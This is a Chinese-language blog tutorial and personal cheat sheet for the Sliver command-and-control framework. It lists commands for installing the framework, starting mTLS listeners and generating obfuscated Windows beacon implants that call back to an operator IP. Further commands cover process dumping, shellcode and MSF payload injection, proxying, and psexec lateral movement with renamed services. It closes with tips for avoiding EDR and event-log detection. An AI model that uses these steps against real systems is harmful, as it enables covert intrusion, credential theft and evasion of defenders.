

<!DOCTYPE html>
<html lang="zh-Hans" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Jesen">
  <meta name="keywords" content="Jesen,Jesen&#39;s Blog,ctf,writeups,web,渗透,渗透测试">
  
    <meta name="description" content="笔者最近在使用sliver过程中，发现目前中文社区内暂无较为完善的教程。 而且目前命令搜索相当麻烦，因此整理出一份入土教程供大家参考 当然了，同时也会作为本人备忘录使用。 安装 一键脚本  1curl -q -o- https:&#x2F;&#x2F;sliver.sh&#x2F;install | sudo bash  自行下载  12345678910111213141516171819    直接从https:&#x2F;&#x2F;git">
<meta property="og:type" content="article">
<meta property="og:title" content="Sliver从入门到入土">
<meta property="og:url" content="https://jesen.ddwhm.com/2023/02/10/sliver_c2.html">
<meta property="og:site_name" content="Jesen&#39;s Blog">
<meta property="og:description" content="笔者最近在使用sliver过程中，发现目前中文社区内暂无较为完善的教程。 而且目前命令搜索相当麻烦，因此整理出一份入土教程供大家参考 当然了，同时也会作为本人备忘录使用。 安装 一键脚本  1curl -q -o- https:&#x2F;&#x2F;sliver.sh&#x2F;install | sudo bash  自行下载  12345678910111213141516171819    直接从https:&#x2F;&#x2F;git">
<meta property="og:locale">
<meta property="og:image" content="https://jesen.ddwhm.com/2023/02/10/sliver_c2/image-20230210230859968.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2023/02/10/sliver_c2/FzKX4_Sliver%20C2%20Implant-16377473396871.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2023/02/10/sliver_c2/Pasted%20image%2020220926232548.png">
<meta property="article:published_time" content="2023-02-10T14:24:33.000Z">
<meta property="article:modified_time" content="2023-02-10T16:27:33.122Z">
<meta property="article:author" content="Jesen">
<meta property="article:tag" content="远控">
<meta property="article:tag" content="sliver">
<meta property="article:tag" content="入门教程">
<meta property="article:tag" content="笔记">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://jesen.ddwhm.com/2023/02/10/sliver_c2/image-20230210230859968.png">
  
  
  <title>Sliver从入门到入土 - Jesen&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"jesen.ddwhm.com","root":"/","version":"1.8.14","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"#"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/js/utils.js" ></script>
  <script  src="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Jesen&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Sliver从入门到入土">
              
                Sliver从入门到入土
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2023-02-10 22:24" pubdate>
        February 10, 2023 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.9k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      33 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Sliver从入门到入土</h1>
            
            <div class="markdown-body">
              <p>笔者最近在使用sliver过程中，发现目前中文社区内暂无较为完善的教程。</p>
<p>而且目前命令搜索相当麻烦，因此整理出一份入土教程供大家参考</p>
<p>当然了，同时也会作为本人备忘录使用。</p>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><ol>
<li><p>一键脚本</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><pre><code class="hljs shell">curl -q -o- https://sliver.sh/install | sudo bash<br></code></pre></td></tr></table></figure>
</li>
<li><p>自行下载</p>
 <figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs awk">    直接从https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/BishopFox/</span>sliver/releases下载，<br>    服务端下载-server，例如wget https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/BishopFox/</span>sliver<span class="hljs-regexp">/releases/</span>download<span class="hljs-regexp">/v1.5.34/</span>sliver-server_linux<br>    客户端用的上就下载,是-client<br><br>​	需要注意最好机器上安装msf，如果需要stage的话，msf是必须的。<br><br><span class="hljs-comment">## 使用</span><br><br><span class="hljs-comment">### 协同工作</span><br><br>**服务端**<br><br>需要注意的是，server端默认监听的端口为<span class="hljs-number">31337</span>。创建用户配置文件尽量不要用默认的。<br><br>```sh<br><span class="hljs-comment">#创建用户配置文件</span><br>new-operator --name Jesen --lport <span class="hljs-number">20000</span> --lhost <span class="hljs-number">1.1</span>.<span class="hljs-number">1.1</span><br><span class="hljs-comment">#启用多用户</span><br>multiplayer -l <span class="hljs-number">20000</span><br></code></pre></td></tr></table></figure>

</li>
</ol>
<p><strong>客户端</strong></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment">#配置文件放入位置</span><br>windows=C:\Users\xxx\.sliver-client\configs\<br>linux=~/.sliver-client/configs/<br></code></pre></td></tr></table></figure>

<p>放入之后，如果只有一个配置文件，那么直接运行client即可，无需import，否则需要import</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/sliver-client_linux import /</span>root<span class="hljs-regexp">/tool/</span>Jesen_1.<span class="hljs-number">1.1</span>.<span class="hljs-number">1</span>.cfg<br></code></pre></td></tr></table></figure>

<h3 id="设置监听"><a href="#设置监听" class="headerlink" title="设置监听"></a>设置监听</h3><p>支持mtls http https dns wg</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment">#监听本机23333端口</span><br>mtls -l 23333<br></code></pre></td></tr></table></figure>

<p>其他协议同理，不会就-h</p>
<h3 id="生成木马（Implants）"><a href="#生成木马（Implants）" class="headerlink" title="生成木马（Implants）"></a>生成木马（Implants）</h3><p>​    b站上面有个教程很粗糙（<del>没错，就是写着最细的那个</del>），误人子弟。他没有说明beacon和session的区别，跟着他走是生成session，会有一些局限性。在最新版本中，如果生成的beacon，通过interactive命令即可很快的转成session，反之，不好意思官方没有实现。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta">#</span><span class="bash">首先要记住，遇事不决-h / <span class="hljs-built_in">help</span></span><br><span class="hljs-meta">#</span><span class="bash">例如generate -h</span><br><span class="hljs-meta"></span><br><span class="hljs-meta">#</span><span class="bash">生成beacon,采用mtls回连1.1.1.1的23333端口,如无特殊说明，演示机IP均会打码成1.1.1.1</span><br>generate beacon --arch amd64 --os windows --mtls 1.1.1.1:23333 --save .<br><span class="hljs-meta"></span><br><span class="hljs-meta">#</span><span class="bash">时间会有点长，因为要混淆，大概输出结果如下</span><br>[*] Generating new windows/amd64 beacon implant binary (1m0s)<br>[*] Symbol obfuscation is enabled<br>[*] Build completed in 00:01:05<br>[*] Implant saved to /xxx/DIFFICULT_DYNAMO.exe<br><span class="hljs-meta"></span><br><span class="hljs-meta"></span><br><span class="hljs-meta">#</span><span class="bash">重新用同样配置生成新的</span><br>regenerate<br></code></pre></td></tr></table></figure>

<h3 id="开始干活"><a href="#开始干活" class="headerlink" title="开始干活"></a>开始干活</h3><p>上线会有提示，用<code>beacons</code>命令可以看到：</p>
<p><img src="/2023/02/10/sliver_c2/image-20230210230859968.png" srcset="/img/loading.gif" lazyload alt="image-20230210230859968"></p>
<p>输入use，选择对应的beacon。</p>
<h4 id="基本信息"><a href="#基本信息" class="headerlink" title="基本信息"></a>基本信息</h4><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment">#用户名</span><br>whoami<br><span class="hljs-comment">#ip</span><br>ifconfig<br><span class="hljs-comment">#当前目录</span><br><span class="hljs-built_in">pwd</span><br><span class="hljs-comment">#查看文件内容</span><br>cat [path]<br><span class="hljs-comment">#切换目录</span><br><span class="hljs-built_in">cd</span> [location]<br><span class="hljs-comment">#列目录</span><br>ls<br><span class="hljs-comment">#高级操作</span><br>execute-assembly<br>execute-assembly (inline with --in-process)<br><br><span class="hljs-comment">#进程操作</span><br>ps [-c/--print-cmdline]<br>-c代表显示命令行参数？<br>terminate [pid]<br>procdump -p [pid]<br>migrate [pid] (Windows Only)<br><span class="hljs-comment">#上传下载</span><br>upload [<span class="hljs-built_in">local</span> src] &lt;remote dst&gt;<br>download remote-path [local-path/.]<br><span class="hljs-comment">#获取gid pid uid</span><br>getgid<br>getpid<br>getuid<br><span class="hljs-comment">#关闭interactive session，不关闭进程</span><br>close<br><span class="hljs-comment">#beacon转换session（需要等待beacon回连周期）（无法显示看出来，只能看颜色，红色session蓝色beacon）</span><br>interactive<br><span class="hljs-comment">#文件操作</span><br>mv<br>rename<br>rm<br>mkdir<br><span class="hljs-comment">#网络</span><br>netstat<br><span class="hljs-comment">#链接远程ssh</span><br>ssh -l root -P root123 192.168.0.100 ls<br><span class="hljs-comment">#关闭session（根据Implants名字或者session id）</span><br><span class="hljs-built_in">kill</span><br><span class="hljs-comment">#session信息</span><br>info<br>ping(session存活否？)<br><span class="hljs-comment">#截图</span><br>screenshot<br><br><br><br><span class="hljs-comment">#其他的就自己看翻译吧</span><br>  execute            Execute a program on the remote system<br>  execute-shellcode  Executes the given shellcode <span class="hljs-keyword">in</span> the sliver process<br>  extensions         Manage extensions<br>  msf                Execute an MSF payload <span class="hljs-keyword">in</span> the current process<br>  msf-inject         Inject an MSF payload into a process<br>  pivots             List pivots <span class="hljs-keyword">for</span> active session<br>  portfwd            In-band TCP port forwarding<br>  reconfig           Reconfigure the active beacon/session <br>  rportfwd           reverse port forwardings<br>  shell              Start an interactive shell<br>  shikata-ga-nai     Polymorphic binary shellcode encoder（shellcode编码器，msf）<br>  sideload           Load and execute a shared object (DLL) <span class="hljs-keyword">in</span> a remote process<br>  socks5             In-band SOCKS5 Proxy<br></code></pre></td></tr></table></figure>

<h4 id="代理、端口相关"><a href="#代理、端口相关" class="headerlink" title="代理、端口相关"></a>代理、端口相关</h4><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment">#socks5开启</span><br>Start an in-band SOCKS5 proxy<br>Usage:<br>======<br>  start [flags]<br>Flags:<br>======<br>  -h, --<span class="hljs-built_in">help</span>           display <span class="hljs-built_in">help</span><br>  -H, --host string    Bind a Socks5 Host (default: 127.0.0.1)<br>  -P, --port string    Bind a Socks5 Port (default: 1081)<br>  -u, --user string    socks5 auth username (will generate random password)<br><span class="hljs-comment">#socks5关闭</span><br>socks5 stop -i [ID从1开始]<br><br><span class="hljs-comment">#端口转发开启</span><br>portfwd add -b 127.0.0.1:13389 -r 192.168.0.100:3389<br>portfwd rm -i [ID从1开始]<br>rportfwd 转发本地端口到远程，命令类似。<br><br></code></pre></td></tr></table></figure>



<h4 id="域相关"><a href="#域相关" class="headerlink" title="域相关"></a>域相关</h4><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sh">getsystem<br>psexec<br><span class="hljs-comment">#需要先创建profiles</span><br>profiles new --format service --skip-symbols --mtls 1.1.1.1:23333 win-svc64<br><span class="hljs-comment">#创建完才能psexec，记得改名字和描述，不然会显示sliver，一看就看出来</span><br>psexec -d Description -s ServiceName -p win-svc64 TARGET_FQDN<br></code></pre></td></tr></table></figure>





<p><img src="/2023/02/10/sliver_c2/FzKX4_Sliver%20C2%20Implant-16377473396871.png" srcset="/img/loading.gif" lazyload alt="Sliver C2 Implant"></p>
<h4 id="扩展能力"><a href="#扩展能力" class="headerlink" title="扩展能力"></a>扩展能力</h4><p>首先要更新索引</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sh">sliver &gt; armory<br><br>[*] Fetching 1 armory index(es) ... <span class="hljs-keyword">done</span>!<br>[*] Fetching package information ... <span class="hljs-keyword">done</span>!<br>[...trim...]<br></code></pre></td></tr></table></figure>

<p>安装官方的工具，无需安装coffloader。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sh">armory install rubeus<br>armory install seatbelt<br>armory install nanodump<br></code></pre></td></tr></table></figure>

<p>安装非官方工具，需要安装<a target="_blank" rel="noopener" href="https://github.com/sliverarmory/COFFLoader">COFF Loader</a> extension</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment">#参考链接1： cna转sliver格式</span><br>https://github.com/BishopFox/sliver/wiki/BOF-&amp;-COFF-Support<span class="hljs-comment">#converting-bofs-to-sliver</span><br></code></pre></td></tr></table></figure>

<p>能力的使用: 需要注意如果给扩展传参数，前面需要加—表示sliver自己的参数已经给完了，—之后的全是seatbelt的参数了。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sh">seatbelt -i -- -group=system<br></code></pre></td></tr></table></figure>



<h4 id="额外注意"><a href="#额外注意" class="headerlink" title="额外注意"></a>额外注意</h4><ol>
<li>shell命令会导致日志的生成，而且目前没有实现参数混淆，会导致edr发现你的敏感操作。</li>
</ol>
<p><img src="/2023/02/10/sliver_c2/Pasted%20image%2020220926232548.png" srcset="/img/loading.gif" lazyload alt="event log view"></p>
<ol start="2">
<li><p>少在cmd/ps中使用whoami,hostname,systeminfo等命令，转而使用框架自带命令，因为那些原生命令处于监控之中。</p>
</li>
<li><p>文档写于20230210，如有遗漏请留言补充，我会同步更新到文章中。</p>
</li>
<li><p>随着时间流逝本篇文章不可避免会过时，目前最新sliver版本如下：</p>
 <figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs angelscript"><span class="hljs-string">[*]</span> Client v1<span class="hljs-number">.5</span><span class="hljs-number">.34</span> - windows/amd64<br><span class="hljs-string">[*]</span> Server v1<span class="hljs-number">.5</span><span class="hljs-number">.34</span> - linux/amd64<br></code></pre></td></tr></table></figure>

















</li>
</ol>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E8%BF%9C%E6%8E%A7C2/">远控C2</a>
                    
                      <a class="hover-with-bg" href="/categories/%E8%BF%9C%E6%8E%A7C2/%E6%95%99%E7%A8%8B/">教程</a>
                    
                      <a class="hover-with-bg" href="/categories/%E8%BF%9C%E6%8E%A7C2/%E6%95%99%E7%A8%8B/%E7%AC%94%E8%AE%B0/">笔记</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E8%BF%9C%E6%8E%A7/">远控</a>
                    
                      <a class="hover-with-bg" href="/tags/sliver/">sliver</a>
                    
                      <a class="hover-with-bg" href="/tags/%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8B/">入门教程</a>
                    
                      <a class="hover-with-bg" href="/tags/%E7%AC%94%E8%AE%B0/">笔记</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/01/01/2022zongjie.html">
                        <span class="hidden-mobile">2022zongjie</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"SDu2T9KUB8UY5eF5L3dfbdyt-gzGzoHsz","appKey":"Q4E9nvCrlFLKhPtPLwXlkkxb","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        蒙ICP备19004791号-1
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/js/events.js" ></script>
<script  src="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/js/local-search.js" ></script>



  
    <script  src="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




















<!-- 主题的启动项 保持在最底部 -->
<script  src="https://cdn.jsdelivr.net/gh/mrjesen/mrjesen.github.io/js/boot.js" ></script>


</body>
</html>
